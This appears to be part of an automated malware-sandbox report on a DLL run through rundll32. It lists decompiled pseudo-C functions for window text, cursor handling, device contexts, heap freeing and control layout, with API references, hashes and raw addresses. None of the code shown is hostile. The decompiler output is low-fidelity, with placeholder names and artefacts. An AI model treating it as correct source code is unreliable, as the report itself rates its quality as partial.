                                                                                                        				_v264 = 0;
                                                                                                        				E1003E9B0(_t27,  &_v263, 0, 0xff);
                                                                                                        				if(_t27 > 0x100 || GetWindowTextA(_t21,  &_v264, 0x100) != _t27 || lstrcmpA( &_v264, _t28) != 0) {
                                                                                                        					_t16 = SetWindowTextA(_t21, _t28);
                                                                                                        				}
                                                                                                        				return E10039F21(_t16, _t21, _v8 ^ _t29, _t25, _t27, _t28);
                                                                                                        			}



















                                                                                                        APIs
                                                                                                        • lstrlenA.KERNEL32(1001CD09,?,00000204), ref: 10029723
                                                                                                        • _memset.LIBCMT ref: 10029740
                                                                                                        • GetWindowTextA.USER32 ref: 1002975A
                                                                                                        • lstrcmpA.KERNEL32(00000000,1001CD09,?,00000204), ref: 1002976C
                                                                                                        • SetWindowTextA.USER32(?,1001CD09), ref: 10029778
                                                                                                          • Part of subcall function 1000836F: __CxxThrowException@8.LIBCMT ref: 10008383
                                                                                                          • Part of subcall function 1000836F: __EH_prolog3.LIBCMT ref: 10008390
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 4273134663-0
                                                                                                        • Opcode ID: 73d75559436bcefe679aad859e1ec81ef78f2e52970d834ce1686c7b00a775b9
                                                                                                        • Instruction ID: d79ae2653591de456ef6bd2db6884c1d3a6ceef9402fb6a909dc4ec732488626
                                                                                                        • Opcode Fuzzy Hash: 73d75559436bcefe679aad859e1ec81ef78f2e52970d834ce1686c7b00a775b9
                                                                                                        • Instruction Fuzzy Hash: 630180B6A04228ABE711DFA49CC5BDAB7ACEF08781F004065F946E7141EA709E448BA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 61%
                                                                                                        			E1001FD2C(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				int _t17;
                                                                                                        				int _t27;
                                                                                                        				int _t29;
                                                                                                        				void* _t37;
                                                                                                        				void* _t41;
                                                                                                        				int _t43;
                                                                                                        				void* _t44;
                                                                                                        
                                                                                                        				_t37 = __edx;
                                                                                                        				_push(0xc);
                                                                                                        				E1003EE82(0x10054b80, __ebx, __edi, __esi);
                                                                                                        				_t41 = __ecx;
                                                                                                        				_t17 = lstrlenA( *(_t44 + 8));
                                                                                                        				SendMessageA( *(_t41 + 0x20), 0xb0, _t44 - 0x18, _t44 - 0x14);
                                                                                                        				if(_t17 ==  *(_t44 - 0x14) -  *(_t44 - 0x18)) {
                                                                                                        					E10001DB0(_t44 - 0x10, E10007F7E());
                                                                                                        					 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
                                                                                                        					E1001FCC1(_t41, __eflags, _t44 - 0x10);
                                                                                                        					__eflags =  *(_t44 + 0xc);
                                                                                                        					_push( *((intOrPtr*)(_t44 - 0x10)));
                                                                                                        					_push( *(_t44 + 8));
                                                                                                        					if( *(_t44 + 0xc) == 0) {
                                                                                                        						_t27 = lstrcmpiA();
                                                                                                        					} else {
                                                                                                        						_t27 = lstrcmpA();
                                                                                                        					}
                                                                                                        					__eflags = _t27;
                                                                                                        					if(_t27 == 0) {
                                                                                                        						_t43 = 1;
                                                                                                        					} else {
                                                                                                        						_t43 = 0;
                                                                                                        						__eflags = 0;
                                                                                                        					}
                                                                                                        					__eflags =  *((intOrPtr*)(_t44 - 0x10)) + 0xfffffff0;
                                                                                                        					E10001280( *((intOrPtr*)(_t44 - 0x10)) + 0xfffffff0, _t37);
                                                                                                        					_t29 = _t43;
                                                                                                        				} else {
                                                                                                        					_t29 = 0;
                                                                                                        				}
                                                                                                        				return E1003EF21(_t29);
                                                                                                        			}











                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 1001FD33
                                                                                                        • lstrlenA.KERNEL32(?,0000000C,100202E6,?,?), ref: 1001FD3D
                                                                                                        • SendMessageA.USER32 ref: 1001FD55
                                                                                                        • lstrcmpA.KERNEL32(?,?,00000000), ref: 1001FD92
                                                                                                        • lstrcmpiA.KERNEL32(?,?,00000000), ref: 1001FDB3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3MessageSendlstrcmplstrcmpilstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1609606499-0
                                                                                                        • Opcode ID: 8a296c5ca0aafa06c8edc8aeb3344f173ee353cdff9e58b4c12b408c3357251e
                                                                                                        • Instruction ID: 77828da9436fa0150061cf1079abb91dd9198ff343c3eae9ce8ecb19b3ffa369
                                                                                                        • Opcode Fuzzy Hash: 8a296c5ca0aafa06c8edc8aeb3344f173ee353cdff9e58b4c12b408c3357251e
                                                                                                        • Instruction Fuzzy Hash: 420169366000299FEB51DBE4CC45AFE77BAFF14790F110219F902AA191CF70AA809BA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 73%
                                                                                                        			E10023E91(void* __ebx, void* __ecx, void* __edi, char _a8) {
                                                                                                        				struct tagPOINT _v12;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				intOrPtr _t15;
                                                                                                        				intOrPtr _t18;
                                                                                                        				void* _t27;
                                                                                                        				intOrPtr* _t29;
                                                                                                        
                                                                                                        				_push(__ecx);
                                                                                                        				_push(__ecx);
                                                                                                        				_t30 = _a8 - 1;
                                                                                                        				_t27 = __ecx;
                                                                                                        				if(_a8 == 1) {
                                                                                                        					GetCursorPos( &_v12);
                                                                                                        					ScreenToClient( *(_t27 + 0x20),  &_v12);
                                                                                                        					__eflags =  *((intOrPtr*)(_t27 + 0x10c)) - 2;
                                                                                                        					if( *((intOrPtr*)(_t27 + 0x10c)) == 2) {
                                                                                                        						L7:
                                                                                                        						_push(LoadCursorA(0, 0x7f00));
                                                                                                        					} else {
                                                                                                        						_t18 = E10023CDE(_t27,  &_v12,  &_a8);
                                                                                                        						__eflags = _t18;
                                                                                                        						if(_t18 == 0) {
                                                                                                        							goto L7;
                                                                                                        						} else {
                                                                                                        							_t29 = _t27 + 0x120;
                                                                                                        							__eflags =  *_t29;
                                                                                                        							if(__eflags == 0) {
                                                                                                        								 *_t29 = LoadCursorA( *(E1000AB19(__ebx, __edi, _t29, __eflags) + 0xc), 0x7902);
                                                                                                        							}
                                                                                                        							_push( *_t29);
                                                                                                        						}
                                                                                                        					}
                                                                                                        					SetCursor();
                                                                                                        					_t15 = 0;
                                                                                                        					__eflags = 0;
                                                                                                        				} else {
                                                                                                        					_t15 = E1000E541(__ebx, __ecx, __edi, _t30);
                                                                                                        				}
                                                                                                        				return _t15;
                                                                                                        			}











                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Cursor$ClientLoadScreen
                                                                                                        • String ID:
                                                                                                        • API String ID: 120721131-0
                                                                                                        • Opcode ID: 74d2b440bdd97ca74c93bb51cf6cc3d31f3ccc4228e571ad7a2809ea142265f6
                                                                                                        • Instruction ID: cd1d569dbbc09192928a42496d03b828ff21698325098b174b07d59a507fd74d
                                                                                                        • Opcode Fuzzy Hash: 74d2b440bdd97ca74c93bb51cf6cc3d31f3ccc4228e571ad7a2809ea142265f6
                                                                                                        • Instruction Fuzzy Hash: 03019EB1904219EFEB00DBA1DC4AE8A77FCEF04751F418425F949A6091EB74AA84CF60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1002526E(void* _a4, void* _a8) {
                                                                                                        				void* _v12;
                                                                                                        				void* _t7;
                                                                                                        				DEVMODEA* _t8;
                                                                                                        				struct HDC__* _t17;
                                                                                                        				void* _t21;
                                                                                                        				struct HDC__* _t25;
                                                                                                        				signed short* _t28;
                                                                                                        
                                                                                                        				if(_a4 != 0) {
                                                                                                        					_t7 = GlobalLock(_a4);
                                                                                                        					_t21 = _a8;
                                                                                                        					_t28 = _t7;
                                                                                                        					if(_t21 == 0) {
                                                                                                        						_t8 = 0;
                                                                                                        					} else {
                                                                                                        						_t8 = GlobalLock(_t21);
                                                                                                        					}
                                                                                                        					if(_t28 != 0) {
                                                                                                        						_t25 = CreateDCA(_t28 + ( *_t28 & 0x0000ffff), _t28 + (_t28[1] & 0x0000ffff), _t28 + (_t28[2] & 0x0000ffff), _t8);
                                                                                                        						GlobalUnlock(_v12);
                                                                                                        						if(_t21 != 0) {
                                                                                                        							GlobalUnlock(_t21);
                                                                                                        						}
                                                                                                        						_t17 = _t25;
                                                                                                        					} else {
                                                                                                        						_t17 = 0;
                                                                                                        					}
                                                                                                        					return _t17;
                                                                                                        				}
                                                                                                        				return 0;
                                                                                                        			}











                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: GlobalLock
                                                                                                        • String ID:
                                                                                                        • API String ID: 2848605275-0
                                                                                                        • Opcode ID: 58ceba588bdf153a735d19f2c057d62138fc618c6032f0ba06e9324e1696806c
                                                                                                        • Instruction ID: b67ccbe8f1da40791c83d960b7f87205bb2ab9deaf7b99a51417704be82a18a1
                                                                                                        • Opcode Fuzzy Hash: 58ceba588bdf153a735d19f2c057d62138fc618c6032f0ba06e9324e1696806c
                                                                                                        • Instruction Fuzzy Hash: 18F0F971601331D7C360CB25EC84A177BDCEF89AA2B554C25F845E2240D635CC08D770
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Similarity
                                                                                                        • API ID: String$Byte$Free_memcmp
                                                                                                        • String ID:
                                                                                                        • API String ID: 1539101663-0
                                                                                                        • Opcode ID: 1f96247d5dc3cde1eafd621ec8853b25e240a467bea0432b1988a91b4f4e3fdd
                                                                                                        • Instruction ID: 904f76b961c1897f44991566d87fdad2c69b44d4214e760ea279cbe038b82c15
                                                                                                        • Opcode Fuzzy Hash: 1f96247d5dc3cde1eafd621ec8853b25e240a467bea0432b1988a91b4f4e3fdd
                                                                                                        • Instruction Fuzzy Hash: 43F06D32A00119FBDB11AF65DD8989F7FA9FF442947510469F90996120EB31DF00DB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 39%
                                                                                                        			E10039F30(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				intOrPtr* _t10;
                                                                                                        				intOrPtr _t13;
                                                                                                        				intOrPtr _t23;
                                                                                                        				void* _t25;
                                                                                                        
                                                                                                        				_push(0xc);
                                                                                                        				_push(0x1006cbc8);
                                                                                                        				_t8 = E1003F350(__ebx, __edi, __esi);
                                                                                                        				_t23 =  *((intOrPtr*)(_t25 + 8));
                                                                                                        				if(_t23 == 0) {
                                                                                                        					L9:
                                                                                                        					return E1003F395(_t8);
                                                                                                        				}
                                                                                                        				if( *0x1009b238 != 3) {
                                                                                                        					_push(_t23);
                                                                                                        					L7:
                                                                                                        					_t8 = HeapFree( *0x100995ac, 0, ??);
                                                                                                        					_t31 = _t8;
                                                                                                        					if(_t8 == 0) {
                                                                                                        						_t10 = E1003F256(_t31);
                                                                                                        						 *_t10 = E1003F21B(GetLastError());
                                                                                                        					}
                                                                                                        					goto L9;
                                                                                                        				}
                                                                                                        				E1004091C(4);
                                                                                                        				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                                                                                                        				_t13 = E10040995(_t23);
                                                                                                        				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                                                                                                        				if(_t13 != 0) {
                                                                                                        					_push(_t23);
                                                                                                        					_push(_t13);
                                                                                                        					E100409C0();
                                                                                                        				}
                                                                                                        				 *(_t25 - 4) = 0xfffffffe;
                                                                                                        				_t8 = E10039F86();
                                                                                                        				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                                                                                                        					goto L9;
                                                                                                        				} else {
                                                                                                        					_push( *((intOrPtr*)(_t25 + 8)));
                                                                                                        					goto L7;
                                                                                                        				}
                                                                                                        			}








                                                                                                        APIs
                                                                                                        • __lock.LIBCMT ref: 10039F4E
                                                                                                          • Part of subcall function 1004091C: __mtinitlocknum.LIBCMT ref: 10040930
                                                                                                          • Part of subcall function 1004091C: __amsg_exit.LIBCMT ref: 1004093C
                                                                                                          • Part of subcall function 1004091C: EnterCriticalSection.KERNEL32(00000001,00000001,?,10045B45,0000000D,1006CE80,00000008,10045C37,00000001,?,?,00000001,?,?,1003D264,00000001), ref: 10040944
                                                                                                        • ___sbh_find_block.LIBCMT ref: 10039F59
                                                                                                        • ___sbh_free_block.LIBCMT ref: 10039F68
                                                                                                        • HeapFree.KERNEL32(00000000,?,1006CBC8,0000000C,10045A9B,00000000,?,100416EE,?,00000001,00000001,100408A6,00000018,1006CDA0,0000000C,10040935), ref: 10039F98
                                                                                                        • GetLastError.KERNEL32(?,100416EE,?,00000001,00000001,100408A6,00000018,1006CDA0,0000000C,10040935,00000001,00000001,?,10045B45,0000000D,1006CE80), ref: 10039FA9
                                                                                                        Similarity
                                                                                                        • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                        • String ID:
                                                                                                        • API String ID: 2714421763-0
                                                                                                        • Opcode ID: fad808a6aa72dc2463189a86ec99b203af1aab2ab6548a90a9c4c89e3f65d7c9
                                                                                                        • Instruction ID: 8d3ad547cfeb5d1e3a48017fed18afe67e470666c06bcb8db026dd063567bcab
                                                                                                        • Opcode Fuzzy Hash: fad808a6aa72dc2463189a86ec99b203af1aab2ab6548a90a9c4c89e3f65d7c9
                                                                                                        • Instruction Fuzzy Hash: F9016275805716AEEB12DFB09C4679E7AA4EF41662F200129F448EE1D1DB34AA408B58
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 67%
                                                                                                        			E10012CC8(intOrPtr* __ecx, intOrPtr* _a4, signed int _a8, signed int _a12) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				intOrPtr* _v20;
                                                                                                        				signed int _v24;
                                                                                                        				intOrPtr* _v28;
                                                                                                        				signed int _v32;
                                                                                                        				struct tagRECT _v48;
                                                                                                        				struct tagRECT _v64;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				intOrPtr _t181;
                                                                                                        				intOrPtr _t182;
                                                                                                        				intOrPtr _t185;
                                                                                                        				signed char _t187;
                                                                                                        				intOrPtr* _t189;
                                                                                                        				signed char _t193;
                                                                                                        				signed int _t196;
                                                                                                        				intOrPtr* _t210;
                                                                                                        				intOrPtr _t213;
                                                                                                        				intOrPtr* _t214;
                                                                                                        				signed int _t223;
                                                                                                        				signed int _t230;
                                                                                                        				intOrPtr* _t232;
                                                                                                        				void* _t243;
                                                                                                        				intOrPtr _t257;
                                                                                                        				signed int _t264;
                                                                                                        				signed int _t273;
                                                                                                        				signed int _t276;
                                                                                                        				signed int _t278;
                                                                                                        				intOrPtr* _t281;
                                                                                                        				intOrPtr _t282;
                                                                                                        				intOrPtr* _t286;
                                                                                                        				void* _t290;
                                                                                                        				intOrPtr _t291;
                                                                                                        				intOrPtr* _t293;
                                                                                                        
                                                                                                        				_t281 = _a4;
                                                                                                        				_push(0);
                                                                                                        				_t232 = __ecx;
                                                                                                        				_push(0);
                                                                                                        				_push(0x418);
                                                                                                        				_v8 = 0;
                                                                                                        				 *_t281 = 0;
                                                                                                        				 *((intOrPtr*)(_t281 + 4)) = 0;
                                                                                                        				 *((intOrPtr*)( *__ecx + 0x110))();
                                                                                                        				_v16 = 0;
                                                                                                        				if(0 != 0) {
                                                                                                        					_t276 = 0x14;
                                                                                                        					_t277 = 0 * _t276 >> 0x20;
                                                                                                        					_t185 = E1000775D(0,  ~0x00BADBAD | 0 * _t276);
                                                                                                        					_t290 = 0;
                                                                                                        					_v8 = _t185;
                                                                                                        					if(_v16 > 0) {
                                                                                                        						_t282 = _t185;
                                                                                                        						do {
                                                                                                        							E10011BF2(_t232, _t290, _t282);
                                                                                                        							_t290 = _t290 + 1;
                                                                                                        							_t282 = _t282 + 0x14;
                                                                                                        						} while (_t290 < _v16);
                                                                                                        						_t291 = _v16;
                                                                                                        						_t281 = _a4;
                                                                                                        						_t243 = 0;
                                                                                                        						if(_t291 > 0) {
                                                                                                        							_t187 =  *(_t232 + 0x80);
                                                                                                        							if((_t187 & 0x00000002) == 0) {
                                                                                                        								_t277 = _t187 & 0x00000004;
                                                                                                        								if((_t187 & 0x00000004) == 0) {
                                                                                                        									L20:
                                                                                                        									_push(_t243);
                                                                                                        									asm("sbb eax, eax");
                                                                                                        									_t223 =  ~(_a8 & 0x00000002) & 0x00007fff;
                                                                                                        									__eflags = _t223;
                                                                                                        									_push(_t223);
                                                                                                        								} else {
                                                                                                        									if((_a8 & 0x00000004) == 0) {
                                                                                                        										__eflags = _a8 & 0x00000008;
                                                                                                        										if((_a8 & 0x00000008) == 0) {
                                                                                                        											__eflags = _a8 & 0x00000010;
                                                                                                        											if((_a8 & 0x00000010) == 0) {
                                                                                                        												__eflags = _a12 - 0xffffffff;
                                                                                                        												if(_a12 == 0xffffffff) {
                                                                                                        													__eflags = _t187 & 0x00000001;
                                                                                                        													if((_t187 & 0x00000001) != 0) {
                                                                                                        														goto L8;
                                                                                                        													} else {
                                                                                                        														goto L20;
                                                                                                        													}
                                                                                                        												} else {
                                                                                                        													SetRectEmpty( &_v48);
                                                                                                        													 *((intOrPtr*)( *_t232 + 0x140))( &_v48, _a8 & 0x00000002);
                                                                                                        													_t230 = _a8 & 0x00000020;
                                                                                                        													__eflags = _t230;
                                                                                                        													if(_t230 == 0) {
                                                                                                        														_t273 = _v48.right - _v48.left;
                                                                                                        														__eflags = _t273;
                                                                                                        													} else {
                                                                                                        														_t273 = _v48.bottom - _v48.top;
                                                                                                        													}
                                                                                                        													_push(_t230);
                                                                                                        													_t243 = _t273 + _a12;
                                                                                                        													goto L13;
                                                                                                        												}
                                                                                                        											} else {
                                                                                                        												_push(0);
                                                                                                        												L13:
                                                                                                        												_push(_t243);
                                                                                                        											}
                                                                                                        										} else {
                                                                                                        											_push(0);
                                                                                                        											_push(0x7fff);
                                                                                                        										}
                                                                                                        									} else {
                                                                                                        										L8:
                                                                                                        										_push(_t243);
                                                                                                        										_push( *((intOrPtr*)(_t232 + 0x70)));
                                                                                                        									}
                                                                                                        								}
                                                                                                        								_push(_t291);
                                                                                                        								_push(_v8);
                                                                                                        								E100125DE(_t232, _t277);
                                                                                                        							}
                                                                                                        							_t189 = E100124AF(_t232,  &(_v48.right), _v8, _t291);
                                                                                                        							 *_t281 =  *_t189;
                                                                                                        							 *((intOrPtr*)(_t281 + 4)) =  *((intOrPtr*)(_t189 + 4));
                                                                                                        							if((_a8 & 0x00000040) != 0) {
                                                                                                        								_v24 = 0;
                                                                                                        								_a12 = 0;
                                                                                                        								_v48.bottom =  *((intOrPtr*)(_t232 + 0xa0));
                                                                                                        								 *((intOrPtr*)(_t232 + 0xa0)) = 0;
                                                                                                        								if(_t291 > 0) {
                                                                                                        									_t210 = _v8 + 4;
                                                                                                        									_v28 = _t210;
                                                                                                        									_t257 = _t291;
                                                                                                        									do {
                                                                                                        										if(( *(_t210 + 5) & 0x00000001) != 0 &&  *_t210 != 0) {
                                                                                                        											_a12 = _a12 + 1;
                                                                                                        										}
                                                                                                        										_t210 = _t210 + 0x14;
                                                                                                        										_t257 = _t257 - 1;
                                                                                                        									} while (_t257 != 0);
                                                                                                        									_t314 = _a12;
                                                                                                        									if(_a12 > 0) {
                                                                                                        										_t278 = 0x18;
                                                                                                        										_t213 = E1000775D(_t314,  ~(0 | _t314 > 0x00000000) | _a12 * _t278);
                                                                                                        										_t73 = _t213 + 8; // 0x8
                                                                                                        										_t286 = _t73;
                                                                                                        										_v24 = _t213;
                                                                                                        										_t214 = _v28;
                                                                                                        										_v32 = _a12;
                                                                                                        										_t264 = 0;
                                                                                                        										_a12 = 0;
                                                                                                        										_v12 = 0;
                                                                                                        										_v20 = _t286;
                                                                                                        										_v28 = _t214;
                                                                                                        										while(1) {
                                                                                                        											_t277 = _v32;
                                                                                                        											if(_a12 >= _v32) {
                                                                                                        												break;
                                                                                                        											}
                                                                                                        											if(( *(_t214 + 5) & 0x00000001) != 0 &&  *_t214 != 0) {
                                                                                                        												 *((intOrPtr*)(_t286 - 8)) = _t264;
                                                                                                        												_t277 =  &_v64;
                                                                                                        												 *((intOrPtr*)(_t286 - 4)) =  *_t214;
                                                                                                        												 *((intOrPtr*)( *_t232 + 0x170))(_t264,  &_v64);
                                                                                                        												E10008D4F(_t232,  &_v64);
                                                                                                        												_a12 = _a12 + 1;
                                                                                                        												_v20 = _v20 + 0x18;
                                                                                                        												_t264 = _v12;
                                                                                                        												_t214 = _v28;
                                                                                                        												asm("movsd");
                                                                                                        												asm("movsd");
                                                                                                        												asm("movsd");
                                                                                                        												asm("movsd");
                                                                                                        												_t286 = _v20;
                                                                                                        											}
                                                                                                        											_t264 = _t264 + 1;
                                                                                                        											_t214 = _t214 + 0x14;
                                                                                                        											_v12 = _t264;
                                                                                                        											_v28 = _t214;
                                                                                                        											if(_t264 < _v16) {
                                                                                                        												continue;
                                                                                                        											}
                                                                                                        											break;
                                                                                                        										}
                                                                                                        										_t291 = _v16;
                                                                                                        										_t281 = _a4;
                                                                                                        									}
                                                                                                        								}
                                                                                                        								_t193 =  *(_t232 + 0x80);
                                                                                                        								if((_t193 & 0x00000001) != 0 && (_t193 & 0x00000004) != 0) {
                                                                                                        									 *((intOrPtr*)(_t232 + 0x70)) =  *_t281;
                                                                                                        								}
                                                                                                        								_v12 = _v12 & 0x00000000;
                                                                                                        								_t323 = _t291;
                                                                                                        								if(_t291 > 0) {
                                                                                                        									_v20 = _v8;
                                                                                                        									do {
                                                                                                        										E100122B1(_t232, _t277, _t323, _v12, _v20);
                                                                                                        										_v12 = _v12 + 1;
                                                                                                        										_v20 = _v20 + 0x14;
                                                                                                        									} while (_v12 < _t291);
                                                                                                        								}
                                                                                                        								if(_a12 > 0) {
                                                                                                        									_t293 = _v24 + 8;
                                                                                                        									_v20 = _t293;
                                                                                                        									do {
                                                                                                        										_t196 = E10011593(_t232,  *((intOrPtr*)(_t293 - 4)));
                                                                                                        										_v32 = _t196;
                                                                                                        										if(_t196 != 0) {
                                                                                                        											GetWindowRect( *(_t196 + 0x20),  &_v64);
                                                                                                        											 *((intOrPtr*)( *_t232 + 0x170))( *((intOrPtr*)(_v20 - 8)),  &_v64);
                                                                                                        											E100117F5(_v32, 0, _v64.left -  *_t293 + _v64.left, _v64.top -  *((intOrPtr*)(_t293 + 4)) + _v64.top, 0, 0, 0x15);
                                                                                                        											_t293 = _v20;
                                                                                                        											_t281 = _a4;
                                                                                                        										}
                                                                                                        										_t293 = _t293 + 0x18;
                                                                                                        										_t142 =  &_a12;
                                                                                                        										 *_t142 = _a12 - 1;
                                                                                                        										_t329 =  *_t142;
                                                                                                        										_v20 = _t293;
                                                                                                        									} while ( *_t142 != 0);
                                                                                                        									_push(_v24);
                                                                                                        									E10007788(_t232, _t281, _t293, _t329);
                                                                                                        								}
                                                                                                        								 *((intOrPtr*)(_t232 + 0xa0)) = _v48.bottom;
                                                                                                        							}
                                                                                                        							_push(_v8);
                                                                                                        							E10007788(_t232, _t281, _t291, _t329);
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        				SetRectEmpty( &_v64);
                                                                                                        				 *((intOrPtr*)( *_t232 + 0x140))( &_v64, _a8 & 0x00000002);
                                                                                                        				 *((intOrPtr*)(_t281 + 4)) =  *((intOrPtr*)(_t281 + 4)) + _v64.top - _v64.bottom;
                                                                                                        				 *_t281 =  *_t281 + _v64.left - _v64.right;
                                                                                                        				E1002BB83( &(_v48.right), _a8 & 0x00000001, _a8 & 0x00000002);
                                                                                                        				_t181 =  *_t281;
                                                                                                        				if(_t181 <= _v48.right) {
                                                                                                        					_t181 = _v48.right;
                                                                                                        				}
                                                                                                        				 *_t281 = _t181;
                                                                                                        				_t182 =  *((intOrPtr*)(_t281 + 4));
                                                                                                        				if(_t182 <= _v48.bottom) {
                                                                                                        					_t182 = _v48.bottom;
                                                                                                        				}
                                                                                                        				 *((intOrPtr*)(_t281 + 4)) = _t182;
                                                                                                        				return _t281;
                                                                                                        			}









































                                                                                                        0x10012e3f
                                                                                                        0x10012e43
                                                                                                        0x10012e50
                                                                                                        0x10012e5b
                                                                                                        0x10012e64
                                                                                                        0x10012e64
                                                                                                        0x10012e67
                                                                                                        0x10012e6a
                                                                                                        0x10012e6d
                                                                                                        0x10012e70
                                                                                                        0x10012e72
                                                                                                        0x10012e75
                                                                                                        0x10012e78
                                                                                                        0x10012e7b
                                                                                                        0x10012e7e
                                                                                                        0x10012e7e
                                                                                                        0x10012e84
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10012e8a
                                                                                                        0x10012e91
                                                                                                        0x10012e96
                                                                                                        0x10012e9a
                                                                                                        0x10012ea2
                                                                                                        0x10012eae
                                                                                                        0x10012eb3
                                                                                                        0x10012eb6
                                                                                                        0x10012eba
                                                                                                        0x10012ebd
                                                                                                        0x10012ec3
                                                                                                        0x10012ec4
                                                                                                        0x10012ec5
                                                                                                        0x10012ec6
                                                                                                        0x10012ec7
                                                                                                        0x10012ec7
                                                                                                        0x10012eca
                                                                                                        0x10012ecb
                                                                                                        0x10012ed1
                                                                                                        0x10012ed4
                                                                                                        0x10012ed7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10012ed7
                                                                                                        0x10012ed9
                                                                                                        0x10012edc
                                                                                                        0x10012edc
                                                                                                        0x10012e43
                                                                                                        0x10012edf
                                                                                                        0x10012ee7
                                                                                                        0x10012eef
                                                                                                        0x10012eef
                                                                                                        0x10012ef2
                                                                                                        0x10012ef6
                                                                                                        0x10012ef8
                                                                                                        0x10012efd
                                                                                                        0x10012f00
                                                                                                        0x10012f08
                                                                                                        0x10012f0d
                                                                                                        0x10012f10
                                                                                                        0x10012f14
                                                                                                        0x10012f00
                                                                                                        0x10012f1d
                                                                                                        0x10012f29
                                                                                                        0x10012f2c
                                                                                                        0x10012f32
                                                                                                        0x10012f37
                                                                                                        0x10012f3e
                                                                                                        0x10012f41
                                                                                                        0x10012f4a
                                                                                                        0x10012f6d
                                                                                                        0x10012f89
                                                                                                        0x10012f8e
                                                                                                        0x10012f91
                                                                                                        0x10012f91
                                                                                                        0x10012f94
                                                                                                        0x10012f97
